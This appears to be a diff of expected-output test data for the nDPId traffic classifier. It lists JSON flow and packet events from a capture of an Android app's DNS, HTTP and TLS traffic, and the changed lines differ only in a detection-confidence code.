00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1449652786395,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652786395,"pkt":"RQAAPGAaQABABlqhwKi0AomHgc6vnwBQfAzimQAAAACgAjkI\/akAAAIEBbQEAggKADWCgwAAAAABAwMG"} 
00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1449652786500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652786500,"pkt":"RQAANGAbQABABlqowKi0AomHgc6vnwBQfAzimh3f\/xqAEADlPeYAAAEBCAoANYKOvXlMIw=="} 00560{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1449652786501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":136,"pkt_l4_len":116,"thread_ts_msec":1449652786501,"pkt":"RQAAiGAcQABABlpTwKi0AomHgc6vnwBQfAzimh3f\/xqAGADlKR0AAAEBCAoANYKOvXlMI0dFVCAvaXAtdG8tY291bnRyeSBIVFRQLzEuMQ0KSG9zdDogYXBpLmV1MDEuY2FwcHRhaW4uY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786395,"flow_last_seen":1449652786501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652786501,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/ip-to-country","code":0,"content_type":"","user_agent":""}} 
+00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"ocs.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652786395,"flow_last_seen":1449652786501,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":84,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1449652786501,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.129.206","src_port":44959,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.Azure","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"api.eu01.capptain.com","url":"api.eu01.capptain.com\/ip-to-country","code":0,"content_type":"","user_agent":""}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1449652786934,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":72,"pkt_l4_len":52,"thread_ts_msec":1449652786934,"pkt":"RQAASIK5QABAETMxwKi0AggICAi+ggA1ADS3+1EXAQAAAQAAAAAAAAdhbmRyb2lkB2NsaWVudHMGZ29vZ2xlA2NvbQAAAQAB"} 
-00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"ocs.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652786934,"flow_last_seen":1449652786934,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1449652786934,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":48770,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.PlayStore","breed":"Safe","category":"SoftwareUpdate"},"dns": {"query":"android.clients.google.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787003,"flow_last_seen":1449652787003,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787003,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1449652787003,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787003,"pkt":"RQAAPLBhQABABm1GwKi0Atg60C6hBwG7mRQyoQAAAACgAjkIAHcAAAIEBbQEAggKADWCwAAAAAABAwMG"} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1449652787075,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652787075,"pkt":"RQAANLBiQABABm1NwKi0Atg60C6hBwG7mRQyouLMvMiAEADlCc8AAAEBCAoANYLHGASl5Q=="} 
00693{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1449652787100,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":236,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":236,"pkt_l4_len":216,"thread_ts_msec":1449652787100,"pkt":"RQAA7LBjQABABmyUwKi0Atg60C6hBwG7mRQyouLMvMiAGADlzvUAAAEBCAoANYLKGASl5RYDAQCzAQAArwMBVmhd8vjfjZbbQQM2P+6kSvFiVrQbP+1p3IwwDXzkWPQAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAQAALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787003,"flow_last_seen":1449652787100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652787100,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00936{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24,"source":"ocs.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787003,"flow_last_seen":1449652787100,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":184,"flow_tot_l4_payload_len":184,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1449652787100,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"216.58.208.46","src_port":41223,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"5a236bfc3d18ddef1b1f2f4c9e765d66","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1449652787155,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787155,"pkt":"RQAAPCFMQABABqbowKi0AhcV5seZXwG7KAKjIAAAAACgAjkIsy4AAAIEBbQEAggKADWC0AAAAAABAwMG"} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1449652787273,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652787273,"pkt":"RQAANCFNQABABqbvwKi0AhcV5seZXwG7KAKjIVpZIEyAEADl\/h4AAAEBCAoANYLbl2cJ1g=="} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1449652786152,"flow_last_seen":1449652787289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1449652787289,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"tls": {"version":"TLSv1","client_requested_server_name":"settings.crashlytics.com","ja3":"b030dba3ca09e2e484b9fa75adc4039c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"ocs.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1449652786152,"flow_last_seen":1449652787289,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1449652787289,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"23.21.230.199","src_port":39263,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Crashlytics","breed":"Acceptable","category":"DataTransfer"},"tls": {"version":"TLSv1","client_requested_server_name":"settings.crashlytics.com","ja3":"b030dba3ca09e2e484b9fa75adc4039c","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1449652787507,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":77,"pkt_l4_len":57,"thread_ts_msec":1449652787507,"pkt":"RQAATYLzQABAETLywKi0AggICAgOJQA1ADki+CcDAQAAAQAAAAAAAAR4bXBwCGRldmljZTA2BGV1MDEIY2FwcHRhaW4DY29tAAABAAE="} -00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"xmpp.device06.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00777{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"ocs.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787507,"flow_last_seen":1449652787507,"flow_idle_time":200000,"flow_min_l4_payload_len":49,"flow_max_l4_payload_len":49,"flow_tot_l4_payload_len":49,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1449652787507,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":3621,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"xmpp.device06.eu01.capptain.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787596,"flow_last_seen":1449652787596,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787596,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"137.135.131.52","src_port":46166,"dst_port":5122,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"ocs.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1449652787596,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787596,"pkt":"RQAAPDy4QABABnydwKi0AomHgzS0VhQCr\/++QwAAAACgAjkI08UAAAIEBbQEAggKADWC+wAAAAABAwMG"} 
00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652787983,"flow_last_seen":1449652787983,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652787983,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1449652787983,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652787983,"pkt":"RQAAPMDbQABABoIGwKi0ArL40DbC2QBQ64tD+QAAAACgAjkIoRgAAAIEBbQEAggKADWDIgAAAAABAwMG"} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","flow_datalink":12,"flow_max_packets":3} 
00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1449652788016,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":61,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":61,"pkt_l4_len":41,"thread_ts_msec":1449652788016,"pkt":"RQAAPYMlQABAETLQwKi0AggICAgKHQA1ACmDzlLQAQAAAQAAAAAAAANvY3MIbGFiZ2VuY3kCd3MAAAEAAQ=="} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocs.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"ocs.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788016,"flow_last_seen":1449652788016,"flow_idle_time":200000,"flow_min_l4_payload_len":33,"flow_max_l4_payload_len":33,"flow_tot_l4_payload_len":33,"flow_avg_l4_payload_len":33,"midstream":0,"thread_ts_msec":1449652788016,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"8.8.8.8","src_port":2589,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.OCS","breed":"Fun","category":"Media"},"dns": {"query":"ocs.labgency.ws","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1449652788067,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652788067,"pkt":"RQAANMDcQABABoINwKi0ArL40DbC2QBQ64tD+t7mVuSAEADljSkAAAEBCAoANYMrRwX98w=="} 01332{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1449652788082,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":715,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":715,"pkt_l4_len":695,"thread_ts_msec":1449652788082,"pkt":"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"} -00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787983,"flow_last_seen":1449652788082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1449652788082,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 
+00803{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"ocs.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652787983,"flow_last_seen":1449652788082,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":663,"flow_tot_l4_payload_len":663,"flow_avg_l4_payload_len":221,"midstream":0,"thread_ts_msec":1449652788082,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":49881,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.OCS","breed":"Fun","category":"Media"},"http": {"hostname":"ocu03.labgency.ws","url":"ocu03.labgency.ws\/catalog\/vod?v=3","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1449652788109,"flow_last_seen":1449652788109,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1449652788109,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","flow_datalink":12,"flow_max_packets":3} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1449652788109,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":60,"pkt_l4_len":40,"thread_ts_msec":1449652788109,"pkt":"RQAAPDlmQABABgl8wKi0ArL40DaPSAG7xoy6SQAAAACgAjkIgeAAAAIEBbQEAggKADWDLwAAAAABAwMG"} 
00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1449652788188,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":52,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":52,"pkt_l4_len":32,"thread_ts_msec":1449652788188,"pkt":"RQAANDlnQABABgmDwKi0ArL40DaPSAG7xoy6Sjpn3PmAEADljD4AAAEBCAoANYM3RwX+EQ=="} 00725{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1449652788195,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":260,"pkt_type":2048,"pkt_l3_offset":0,"pkt_l4_offset":20,"pkt_len":260,"pkt_l4_len":240,"thread_ts_msec":1449652788195,"pkt":"RQABBDloQABABgiywKi0ArL40DaPSAG7xoy6Sjpn3PmAGADlDAsAAAEBCAoANYM3RwX+ERYDAQDLAQAAxwMBVmhd83GqZqYQO3oMbwUHPK3VU0gJzqNSdwnP4gncj8QAAEYABAAFAC8ANcACwATABcAMwA7AD8AHwAnACsARwBPAFAAzADkAMgA4AArAA8ANwAjAEgAWABMACQAVABIAAwAIABQAEQD\/AQAAWAAAABQAEgAAD29jcy5sYWJnZW5jeS53cwALAAQDAAECAAoANAAyAAEAAgADAAQABQAGAAcACAAJAAoACwAMAA0ADgAPABAAEQASABMAFAAVABYAFwAYABk="} -00944{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"ocs.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1449652788109,"flow_last_seen":1449652788195,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":208,"flow_tot_l4_payload_len":208,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1449652788195,"l3_proto":"ip4","src_ip":"192.168.180.2","dst_ip":"178.248.208.54","src_port":36680,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.OCS","breed":"Fun","category":"Media"},"tls": 
